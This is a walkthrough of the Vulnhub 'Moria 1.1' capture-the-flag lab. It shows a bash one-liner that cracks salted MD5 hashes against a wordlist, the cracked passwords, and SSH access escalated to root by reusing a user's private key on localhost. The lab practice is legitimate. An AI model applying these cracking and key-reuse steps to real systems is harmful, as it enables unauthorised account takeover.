Vulnhub.com — Moria 1.1 Solution
I originally posted my first effort here, but conceded that I hadn’t managed to get root since I’d been caught up with a hash problem.
I’m not going to migrate the other article here, instead I’ll pick up where I left off.
My issue, as you might recall, was that I had some hashes, had some salts, and had a means of combining them into passwords, but I couldn’t figure out how I was supposed to go right-to-left in the hash function.
I decided to go around it instead, and brute-force an effort left-to-right.
Since I can’t get from the salted hash to the password, what I did was write a bash script to go from a wordlist to a series of hashes using the salts that I’ve been provided.
This script creates a file containing word and salted-hash pairs. The resulting file will contain 9 hashes per input word (since there are 9 salts).
for salt in 6MAp84 bQkChe HnqeN4 e5ad5s g9Wxv7 HCCsxP cC5nTr h8spZR tb9AWe; do for word in $(cat /usr/share/wordlists/dirb/big.txt); do echo -n $word | md5sum | awk -v ss=$salt ‘{printf $1 ss}’ | md5sum | awk -v ww=$word ‘{print ww “ : “ $1}’ >> ~/Desktop/moria/scripts/out.txt ; done; done;What this one-liner does is for each of the salts we have, read in all the words in big.txt and then output the word, and the properly salted-hash next to it. This took so. much. googling.
This means that I can grep for the hashes I have and find out which word led to them.
This worked for 5 of the 9 hashes. That at least gave me something to go off:
c2d8960157fc8540f6d5d66594e165e0 / flower727a279d913fba677c490102b135e51e8c3c3152a5c64ffb683d78efc3520114 / spanky6ba94d6322f53f30aca4f34960203703 / fuckoffc789ec9fae1cd07adfc02930a39486a1fec21f5c7dcf8e5e54537cfda92df5fe / warrior6a113db1fd25c5501ec3a5936d817c29 / abcdef7db5040c351237e8332bfbba757a1019dd272382909a4f51163c77da6356cc6f
Attempting to log in with the first user (which was Balin, with password flower) failed.
I didn’t get a match for Oin.
Next up, Ori with spanky.
Result:
root@kali:~/Desktop/moria/scripts# ssh Ori@172.16.61.149Ori@172.16.61.149's password:Last login: Sun Mar 12 22:57:09 2017-bash-4.2$ iduid=1002(Ori) gid=1003(notBalrog) groups=1003(notBalrog)-bash-4.2$
Having a bit if a look around, there was a poem:
-bash-4.2$ pwd/home/Ori-bash-4.2$ ls -a. .. .bash_history poem.txt .ssh-bash-4.2$ cat poem.txtHo! Ho! Ho! to the bottle I goTo heal my heart and drown my woe.Rain may fall and wind may blow,And many miles be still to go,But under a tall tree I will lie,And let the clouds go sailing by.PS: Moria will not fall!-bash-4.2$
I can only assume that has some significance for Elves.
But I also have a key pair for Ori…
-bash-4.2$ cd .ssh/
-bash-4.2$ ls -a
. .. id_rsa id_rsa.pub known_hosts
-bash-4.2$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC745Nxui7BYpnolFgEldIin1zw3/7D/RHsDSzkrUqPjkUGGkCTRT95kkhylllhS71rnJ8RkWeVQeyFWMPXYpO+8A0h+9NqU/T64as5KUX9vW23w6VVBbxuC8AlcaibzzVuxSe7mvgFenRLkcihERLaT0EeQ/tmaSGScLzcP7NOWf/a4e8f+mIDnHdoUoPPc3O8lA0SOf9T2mK+WMBVWu5drRMNgOeN7Gxm0bcK2x719CWPuyqyiyqZTZpcS7TdH+gc36OUyfbCgqJGdR2gI1o17n+VhLuV4xwyXwAjuEQyAldK50EYLIu7MO9tCBGLd04UCzvZhK4b920w2igQcuvh Ori@Prison-bash-4.2$
And it looks like he’s been playing on localhost:
-bash-4.2$ cat known_hosts
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=-bash-4.2$
I’d assumed from the keyfile that the user name was Ori, but when I tried to log in with the id it prompted for a password.
-bash-4.2$ ssh -i id_rsa Ori@127.0.0.1Ori@127.0.0.1’s password:Permission denied, please try again.
So I enumerated all the usernames that I’d gathered so far from the text and the key file, but they were all prompting for passwords.
-bash-4.2$ ssh -i id_rsa Balrog@127.0.0.1Balrog@127.0.0.1’s password:Permission denied, please try again.Balrog@127.0.0.1’s password:-bash-4.2$ ssh -i id_rsa Oin@127.0.0.1Oin@127.0.0.1’s password:-bash-4.2$ ssh -i id_rsa Maeglin@127.0.0.1Maeglin@127.0.0.1’s password:-bash-4.2$ ssh -i id_rsa Fundin@127.0.0.1Fundin@127.0.0.1’s password:-bash-4.2$ ssh -i id_rsa Nain@127.0.0.1Nain@127.0.0.1’s password:-bash-4.2$ ssh -i id_rsa Dain@127.0.0.1Dain@127.0.0.1’s password:-bash-4.2$ ssh -i id_rsa Thrain@127.0.0.1Thrain@127.0.0.1’s password:-bash-4.2$ ssh -i id_rsa Telchar@127.0.0.1Telchar@127.0.0.1’s password:
Grrr.
Wait a minute, it couldn’t be that simple…could it?
-bash-4.2$ ssh -i id_rsa root@127.0.0.1Last login: Fri Apr 28 18:01:27 2017[root@Moria ~]# iduid=0(root) gid=0(root) groups=0(root)[root@Moria ~]# pwd/root[root@Moria ~]# ls -a. 0 .bash_history .bash_profile .cache .cshrc flag.txt .ICEauthority .pki .tcshrc.. anaconda-ks.cfg .bash_logout .bashrc .config Desktop hosts .local .ssh[root@Moria ~]# cat flag.txt“All that is gold does not glitter,Not all those who wander are lost;The old that is strong does not wither,Deep roots are not reached by the frost.From the ashes a fire shall be woken,A light from the shadows shall spring;Renewed shall be blade that was broken,The crownless again shall be king.”All That is Gold Does Not Glitter by J. R. R. TolkienI hope you suff.. enjoyed this VM. It wasn’t so hard, was it?-Abatchy
Boom!
And there we have it. That was a lot of fun. I assume there is something that I’ve missed which has led me to needing to brute force the salted hashes, and I guess I was lucky that the account I needed to get into ssh had a common password. If not, I suppose I would have continued bruteforcing with other files until I got there, but still — what am I missing?
Thanks to abatchy, and thanks to Vulnhub.
\m/
